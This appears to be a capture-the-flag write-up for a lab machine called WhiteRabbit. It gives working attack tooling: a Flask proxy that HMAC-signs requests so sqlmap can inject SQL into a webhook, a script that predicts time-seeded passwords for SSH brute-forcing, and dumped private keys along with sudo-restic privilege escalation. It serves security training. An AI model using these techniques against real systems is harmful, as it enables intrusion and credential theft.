Enum

$ rustscan --ulimit 10000 -a 10.129.102.113 -- -A -sC
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-`
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we're dating.
 
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 0f:b0:5e:9f:85:81:c6:ce:fa:f4:97:c2:99:c5:db:b3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBslomQGZRF6FPNyXmI7hlh/VDhJq7Px0dkYQH82ajAIggOeo6mByCJMZTpOvQhTxV2QoyuqeKx9j9fLGGwkpzk=
|   256 a9:19:c3:55:fe:6a:9a:1b:83:8f:9d:21:0a:08:95:47 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEoXISApIRdMc65Kw96EahK0EiPZS4KADTbKKkjXSI3b
80/tcp   open  http    syn-ack ttl 62 Caddy httpd
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Caddy
|_http-title: Did not follow redirect to http://whiterabbit.htb
2222/tcp open  ssh     syn-ack ttl 62 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 c8:28:4c:7a:6f:25:7b:58:76:65:d8:2e:d1:eb:4a:26 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKu1+ymf1qRT1c7pGig7JS8MrnSTvbycjrPWQfRLo/DM73E24UyLUgACgHoBsen8ofEO+R9dykVEH34JOT5qfgQ=
|   256 ad:42:c0:28:77:dd:06:bd:19:62:d8:17:30:11:3c:87 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJTObILLdRa6Jfr0dKl3LqWod4MXEhPnadfr+xGSWTQ+
  • /etc/hosts
$ echo "10.129.102.113 whiterabbit.htb" | sudo tee -a /etc/hosts
  • gobuster
$ gobuster vhost -u http://whiterabbit.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain -t 50
 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://whiterabbit.htb
[+] Method:          GET
[+] Threads:         50
[+] Wordlist:        /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: status.whiterabbit.htb Status: 302 [Size: 32] [--> /dashboard]
===============================================================
  • Add status.whiterabbit.htb to /etc/hosts

  • Invalid pages return 200 OK, so cannot gobuster further
  • Can bypass login by intercepting the websocket and forcing true

  • Can avoid manually doing this as often like so:

  • Much of this is useless, but can find new endpoint /status

  • gobuster again on /status
$ gobuster dir -u http://status.whiterabbit.htb/status/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 50
 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://status.whiterabbit.htb/status/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/temp                 (Status: 200) [Size: 3359]
===============================================================

  • Add ddb09a8558c9.whiterabbit.htb & a668910b5514e.whiterabbit.htb to /etc/hosts

  • Download gophish_to_phishing_score_database.json
  • Secret for HMAC signing: 3CWVGMndgMvdVAzOjqBiTicmv7gxc6IS
  • Documentation describes signing a JSON payload with an HMAC signature
  • Because every payload must be signed, need a script to hook sqlmap.

sqlmap.py

import hashlib, hmac, json, subprocess, threading, time, sys
from flask import Flask, request, Response
import requests

# Secret recovered from gophish_to_phishing_score_database.json
SECRET_KEY = b"3CWVGMndgMvdVAzOjqBiTicmv7gxc6IS"
TARGET_URL = "http://28efa8f7df.whiterabbit.htb/webhook/d96af3a4-21bd-4bcb-bd34-37bfc67dfd1d"
PORT = 8888

app = Flask(__name__)

@app.route("/", methods=["POST"])
def proxy():
    # Local signing proxy: sqlmap posts here, we re-serialise the JSON compactly
    # so the signed bytes are exactly the forwarded bytes, add the HMAC-SHA256
    # header and relay the webhook's reply back to sqlmap.
    try:
        raw = json.dumps(json.loads(request.get_data()), separators=(",", ":")).encode()
        sig = hmac.new(SECRET_KEY, raw, hashlib.sha256).hexdigest()
        return Response(
            requests.post(TARGET_URL, headers={
                "Content-Type": "application/json",
                "x-gophish-signature": f"sha256={sig}"
            }, data=raw).content, status=200
        )
    except Exception as e:
        return Response(f"Error: {e}", status=400)

if len(sys.argv) < 2:
    print("Usage: python sqlmap.py [sqlmap args]")
    sys.exit(1)

# Start the proxy in the background, give it a second to bind, then run sqlmap against it
threading.Thread(target=lambda: app.run(host="0.0.0.0", port=PORT, debug=False, threaded=True), daemon=True).start()
time.sleep(1)

subprocess.run([
    "sqlmap",
    "-u", f"http://127.0.0.1:{PORT}",
    "--data", '{"campaign_id":1,"message":"Clicked Link","email":"*"}',
    "--headers", "Content-Type: application/json",
    "--batch", "--level", "5", "--risk", "3",
    "--threads", "10", "--timeout", "10", "--retries", "1",
    "--technique", "BEUSTQ",
    *sys.argv[1:]
])

print("[+] Done.")
  • Execute
$ python3 sqlmap.py --dbs
 
*snip*
available databases [3]:
[*] information_schema
[*] phishing
[*] temp
 
 
$ python3 sqlmap.py --dump -D temp
 
Database: temp
Table: command_log
[6 entries]
+----+---------------------+------------------------------------------------------------------------------+
| id | date                | command                                                                      |
+----+---------------------+------------------------------------------------------------------------------+
| 1  | 2024-08-30 10:44:01 | uname -a                                                                     |
| 2  | 2024-08-30 11:58:05 | restic init --repo rest:http://75951e6ff.whiterabbit.htb                     |
| 3  | 2024-08-30 11:58:36 | echo ygcsvCuMdfZ89yaRLlTKhe5jAmth7vxw > .restic_passwd                       |
| 4  | 2024-08-30 11:59:02 | rm -rf .bash_history                                                         |
| 5  | 2024-08-30 11:59:47 | #thatwasclose                                                                |
| 6  | 2024-08-30 14:40:42 | cd /home/neo/ && /opt/neo-password-generator/neo-password-generator | passwd |
+----+---------------------+------------------------------------------------------------------------------+
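Added example (not from the writeup, nor gophish's own code) showing the receiver side of the signed-webhook scheme above: how a server should verify the x-gophish-signature header in constant time over the raw body, and why the proxy script has to re-serialise the JSON before signing (the HMAC covers the exact bytes on the wire, so re-formatted JSON fails). The secret and event are constructed placeholders, and the function names are my own.

```python
import hashlib
import hmac
import json
from typing import Optional

# Constructed placeholder; a real receiver loads its secret from configuration.
SECRET_KEY = b"example-webhook-secret"
SIG_HEADER = "x-gophish-signature"


def sign_body(secret: bytes, body: bytes) -> str:
    """Header value for a raw body: 'sha256=' + hex(HMAC-SHA256(secret, body))."""
    return "sha256=" + hmac.new(secret, body, hashlib.sha256).hexdigest()


def verify_signature(secret: bytes, body: bytes, header_value: Optional[str]) -> bool:
    """Receiver-side check: constant-time compare over the raw bytes received,
    done before any JSON parsing so tampered or re-encoded bodies are rejected."""
    if not header_value or not header_value.startswith("sha256="):
        return False
    expected = sign_body(secret, body)
    return hmac.compare_digest(expected, header_value)


def canonical(obj) -> bytes:
    """Compact encoding with the same separators the proxy script uses."""
    return json.dumps(obj, separators=(",", ":")).encode()


def demo() -> dict:
    """Exercise the check on a constructed gophish-style event."""
    event = {"campaign_id": 1, "message": "Clicked Link", "email": "user@example.com"}
    body = canonical(event)
    header = sign_body(SECRET_KEY, body)
    pretty = json.dumps(event, indent=2).encode()   # same JSON, different bytes
    tampered = canonical({**event, "email": "other@example.com"})
    return {
        "valid": verify_signature(SECRET_KEY, body, header),
        "reencoded": verify_signature(SECRET_KEY, pretty, header),
        "tampered": verify_signature(SECRET_KEY, tampered, header),
        "missing": verify_signature(SECRET_KEY, body, None),
        "wrong_key": verify_signature(b"some-other-key", body, header),
    }


if __name__ == "__main__":
    print(demo())
```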
  • Add 75951e6ff.whiterabbit.htb to /etc/hosts
$ export RESTIC_PASSWORD=ygcsvCuMdfZ89yaRLlTKhe5jAmth7vxw
$ export RESTIC_REPOSITORY=rest:http://75951e6ff.whiterabbit.htb
$ restic snapshots
 
ID        Time                 Host         Tags        Paths
------------------------------------------------
272cacd5  2025-03-06 19:18:40  whiterabbit              /dev/shm/bob/ssh
------------------------------------------------
 
$ restic restore 272cacd5 --target . --path /dev/shm/bob/ssh
 
restoring snapshot 272cacd5 of [/dev/shm/bob/ssh] at 2025-03-06 17:18:40.024074307 -0700 -0700 by ctrlzero@whiterabbit to .
 
$ cd dev/shm/bob/ssh/
$ ls
bob.7z
$ 7z x bob.7z
 
Extracting archive: bob.7z
--
Path = bob.7z
Type = 7z
Physical Size = 572
Headers Size = 204
Method = LZMA2:12 7zAES
Solid = +
Blocks = 1
 
Enter password (will not be echoed):
  • Requires a password, so try to crack it with 7z2john + hashcat
$ 7z2john bob.7z
ATTENTION: the hashes might contain sensitive encrypted data. Be careful when sharing or posting these hashes
bob.7z:$7z$2$19$0$$8$61d81f6f9997419d0000000000000000$4049814156$368$365$7295a784b0a8cfa7d2b0a8a6f88b961c8351682f167ab77e7be565972b82576e7b5ddd25db30eb27137078668756bf9dff5ca3a39ca4d9c7f264c19a58981981486a4ebb4a682f87620084c35abb66ac98f46fd691f6b7125ed87d58e3a37497942c3c6d956385483179536566502e598df3f63959cf16ea2d182f43213d73feff67bcb14a64e2ecf61f956e53e46b17d4e4bc06f536d43126eb4efd1f529a2227ada8ea6e15dc5be271d60360ff5c816599f0962fc742174ff377e200250b835898263d997d4ea3ed6c3fc21f64f5e54f263ebb464e809f9acf75950db488230514ee6ed92bd886d0a9303bc535ca844d2d2f45532486256fbdc1f606cca1a4680d75fa058e82d89fd3911756d530f621e801d73333a0f8419bd403350be99740603dedff4c35937b62a1668b5072d6454aad98ff491cb7b163278f8df3dd1e64bed2dac9417ca3edec072fb9ac0662a13d132d7aa93ff58592703ec5a556be2c0f0c5a3861a32f221dcb36ff3cd713$399$00
 
$ hashcat -a 0 -m 11600 '$7z$2$19$0$$8$61d81f6f9997419d0000000000000000$4049814156$368$365$...$399$00' /usr/share/wordlists/rockyou.txt

$7z$2$19$0$$8$61d81f6f9997419d0000000000000000$4049814156$368$365$...$399$00:1q2w3e4r5t6y
  • Extract with password 1q2w3e4r5t6y
$ 7z x bob.7z
Scanning the drive for archives:
1 file, 572 bytes (1 KiB)
 
Extracting archive: bob.7z
--
Path = bob.7z
Type = 7z
Physical Size = 572
Headers Size = 204
Method = LZMA2:12 7zAES
Solid = +
Blocks = 1
 
Enter password (will not be echoed):
Everything is Ok
 
Files: 3
Size:       557
Compressed: 572
 
$ ls
bob  bob.7z  bob.pub  config
 
$ cat config
Host whiterabbit
  HostName whiterabbit.htb
  Port 2222
  User bob
 
$ cat bob
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACBvDTUyRwF4Q+A2imxODnY8hBTEGnvNB0S2vaLhmHZC4wAAAJAQ+wJXEPsC
VwAAAAtzc2gtZWQyNTUxOQAAACBvDTUyRwF4Q+A2imxODnY8hBTEGnvNB0S2vaLhmHZC4w
AAAEBqLjKHrTqpjh/AqiRB07yEqcbH/uZA5qh8c0P72+kSNW8NNTJHAXhD4DaKbE4OdjyE
FMQae80HRLa9ouGYdkLjAAAACXJvb3RAbHVjeQECAwQ=
-----END OPENSSH PRIVATE KEY-----
 
$ cat bob.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG8NNTJHAXhD4DaKbE4OdjyEFMQae80HRLa9ouGYdkLj root@lucy

User

  • chmod 600 bob, then SSH on port 2222 as per the config file
$ chmod 600 bob
$ ssh -i bob bob@whiterabbit.htb -p 2222
 
bob@ebdce80611e9:~$ id
uid=1001(bob) gid=1001(bob) groups=1001(bob)
 
bob@ebdce80611e9:~$ sudo -l
Matching Defaults entries for bob on ebdce80611e9:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
 
User bob may run the following commands on ebdce80611e9:
    (ALL) NOPASSWD: /usr/bin/restic
  • Can run restic as root without a password, so back up /root
# Will ask to set a repository password
bob@ebdce80611e9:~$ sudo restic init -r /tmp/asdf
bob@ebdce80611e9:~$ sudo restic -r /tmp/asdf backup /root
bob@ebdce80611e9:~$ sudo restic -r /tmp/asdf ls latest
/root
/root/.bash_history
/root/.bashrc
/root/.cache
/root/.profile
/root/.ssh
/root/morpheus
/root/morpheus.pub
  • Dump the key and attempt an SSH connection as morpheus
bob@ebdce80611e9:~$ sudo restic -r /tmp/asdf dump latest /root/morpheus
 
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS
1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQS/TfMMhsru2K1PsCWvpv3v3Ulz5cBP
UtRd9VW3U6sl0GWb0c9HR5rBMomfZgDSOtnpgv5sdTxGyidz8TqOxb0eAAAAqOeHErTnhx
K0AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBL9N8wyGyu7YrU+w
Ja+m/e/dSXPlwE9S1F31VbdTqyXQZZvRz0dHmsEyiZ9mANI62emC/mx1PEbKJ3PxOo7FvR
4AAAAhAIUBairunTn6HZU/tHq+7dUjb5nqBF6dz5OOrLnwDaTfAAAADWZseEBibGFja2xp
c3QBAg==
-----END OPENSSH PRIVATE KEY-----
 
bob@ebdce80611e9:~$ exit
 
$ nano morpheus   # paste the morpheus key dumped above
 
$ chmod 600 morpheus
$ ssh -i morpheus morpheus@whiterabbit.htb
 
morpheus@whiterabbit:~$ ls
user.txt

Root

  • Recall sqlmap results
| 6  | 2024-08-30 14:40:42 | cd /home/neo/ && /opt/neo-password-generator/neo-password-generator | passwd |
morpheus@whiterabbit:~$ ls /opt
containerd  docker  neo-password-generator
morpheus@whiterabbit:~$ ls /opt/neo-password-generator/
neo-password-generator
morpheus@whiterabbit:~$ exit
 
$ scp -i morpheus morpheus@whiterabbit.htb:/opt/neo-password-generator/neo-password-generator .
 
neo-password-generator 100%   15KB 108.9KB/s   00:00
 
$ ./neo-password-generator
cwdjMefSvBFDnXfu5AS0
$ ./neo-password-generator
TAgLbVDM0Q8mnzEtKg9s
$ ./neo-password-generator
KFtzEjui4gY6N4n2bkfG
$ ./neo-password-generator
hb8xAvaNChtv1M0P13cT
$ ./neo-password-generator
Ax9QAfU5raf1s3ltBCpD
$ ./neo-password-generator
Tpoxw8CSA9Y6vg5W7WK6
$ ./neo-password-generator
jqv6nn5hPFcDizMZ113R
  • Seems random; uploaded to Dogbolt for RE
generate_password(1000 * tv.tv_sec + tv.tv_usec / 1000);
  • Replicate the logic based on time (we have the timestamp 2024-08-30 14:40:42 from command_log)

pwGen.py

import ctypes
from datetime import datetime, timezone

# Same 62-character set the binary indexes with rand() % 62
cs = b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
# Use the real glibc srand()/rand() so the sequence matches the binary
libc = ctypes.CDLL("libc.so.6")
libc.srand.argtypes = [ctypes.c_uint]
libc.rand.restype = ctypes.c_int

# Seed is 1000 * tv_sec + tv_usec / 1000, i.e. epoch milliseconds; passwd ran at
# 2024-08-30 14:40:42 (assumed UTC), so every millisecond of that second is a candidate
dt = datetime(2024, 8, 30, 14, 40, 42, tzinfo=timezone.utc)
base = int(dt.timestamp()) * 1000

with open("pwds.txt", "w") as f:
    for ms in range(1000):
        libc.srand(base + ms)  # srand() takes an unsigned int, so the seed is reduced mod 2^32
        pwd = ''.join(chr(cs[libc.rand() % 62]) for _ in range(20))
        f.write(pwd + "\n")
  • Use hydra + pwds.txt to brute-force neo's SSH login
$ hydra -l neo -P pwds.txt ssh://whiterabbit.htb
*snip*
[22][ssh] host: whiterabbit.htb   login: neo   password: WBSxhWgfnMiclrV4dqfj
 
$ ssh neo@whiterabbit.htb
neo@whiterabbit.htb's password: 'WBSxhWgfnMiclrV4dqfj'
 
neo@whiterabbit:~$ sudo -l
[sudo] password for neo:
Matching Defaults entries for neo on whiterabbit:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
 
User neo may run the following commands on whiterabbit:
    (ALL : ALL) ALL

  • Full sudo privileges, so just read the root flag
neo@whiterabbit:~$ sudo cat /root/root.txt
 
neo@whiterabbit:~$ sudo su
root@whiterabbit:/home/neo#